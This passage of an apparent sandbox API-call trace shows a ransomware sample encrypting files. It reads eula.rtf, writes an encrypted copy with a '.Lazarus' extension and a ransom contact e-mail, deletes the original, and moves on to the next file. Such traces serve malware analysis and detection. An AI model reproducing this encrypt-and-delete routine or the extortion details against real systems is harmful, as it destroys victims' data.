dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.622] AreFileApisANSI () returned 1 [0062.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0062.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0062.622] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac)) returned 1 [0062.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0062.622] AreFileApisANSI () returned 1 [0062.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0062.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.623] GetLastError () returned 0x0 [0062.623] SetLastError (dwErrCode=0x0) [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0062.623] GetLastError () returned 0x0 [0062.623] SetLastError (dwErrCode=0x0) [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0062.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.623] AreFileApisANSI () returned 1 [0062.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0062.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0062.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0062.623] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.743] GetFileType (hFile=0x428) returned 0x1 [0062.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0062.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0062.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0062.743] AreFileApisANSI () returned 1 [0062.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0062.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0062.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0062.743] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0062.743] GetFileType (hFile=0x420) returned 0x1 [0062.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.744] GetLastError () returned 0x0 [0062.744] SetLastError (dwErrCode=0x0) [0062.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.744] GetLastError () returned 0x0 [0062.744] SetLastError (dwErrCode=0x0) [0062.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0062.744] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0064.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0064.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0064.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0064.158] GetLastError () returned 0x0 [0064.158] SetLastError (dwErrCode=0x0) [0064.158] GetLastError () returned 0x0 [0064.158] SetLastError (dwErrCode=0x0) [0064.158] GetLastError () returned 0x0 [0064.158] SetLastError (dwErrCode=0x0) [0064.158] GetLastError () returned 0x0 [0064.158] SetLastError (dwErrCode=0x0) [0064.158] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0065.504] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.505] GetLastError () returned 0x0 [0065.505] SetLastError (dwErrCode=0x0) [0065.505] GetLastError () returned 0x0 [0065.505] SetLastError (dwErrCode=0x0) [0065.505] GetLastError () returned 0x0 [0065.505] SetLastError (dwErrCode=0x0) [0065.505] GetLastError () returned 0x0 [0065.505] SetLastError (dwErrCode=0x0) [0065.505] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x2ac, lpOverlapped=0x0) returned 1 [0065.505] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0065.505] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0065.506] GetLastError () returned 0x0 [0065.506] SetLastError (dwErrCode=0x0) [0065.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d690 [0065.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0065.506] GetLastError () returned 0x0 [0065.506] SetLastError (dwErrCode=0x0) [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0065.506] WriteFile (in: hFile=0x428, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x2b0, lpOverlapped=0x0) returned 1 [0065.506] GetLastError () returned 0x0 [0065.506] SetLastError (dwErrCode=0x0) [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0065.506] GetLastError () returned 0x0 [0065.506] SetLastError (dwErrCode=0x0) [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0065.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0065.506] CloseHandle (hObject=0x428) returned 1 [0065.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0065.509] CloseHandle (hObject=0x420) returned 1 [0065.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0065.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0065.509] AreFileApisANSI () returned 1 [0065.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0065.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0065.510] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.594] GetFileType (hFile=0x420) returned 0x1 [0065.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0065.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e650 [0065.596] GetLastError () returned 0xb7 [0065.597] SetLastError (dwErrCode=0xb7) [0065.597] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0065.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e650 | out: hHeap=0x20000) returned 1 [0065.598] CloseHandle (hObject=0x420) returned 1 [0065.599] AreFileApisANSI () returned 1 [0065.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0065.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0065.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 36 [0065.599] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0065.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.600] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0065.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0065.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0065.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0065.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0065.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0065.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0065.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0065.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0065.602] AreFileApisANSI () returned 1 [0065.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0065.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0065.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0065.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0065.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0065.602] AreFileApisANSI () returned 1 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0065.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.602] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0065.602] GetFileType (hFile=0x420) returned 0x1 [0065.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0065.602] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0065.602] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0065.603] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0065.603] CloseHandle (hObject=0x420) returned 1 [0065.603] AreFileApisANSI () returned 1 [0065.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0065.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0065.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0065.603] CreateFileW 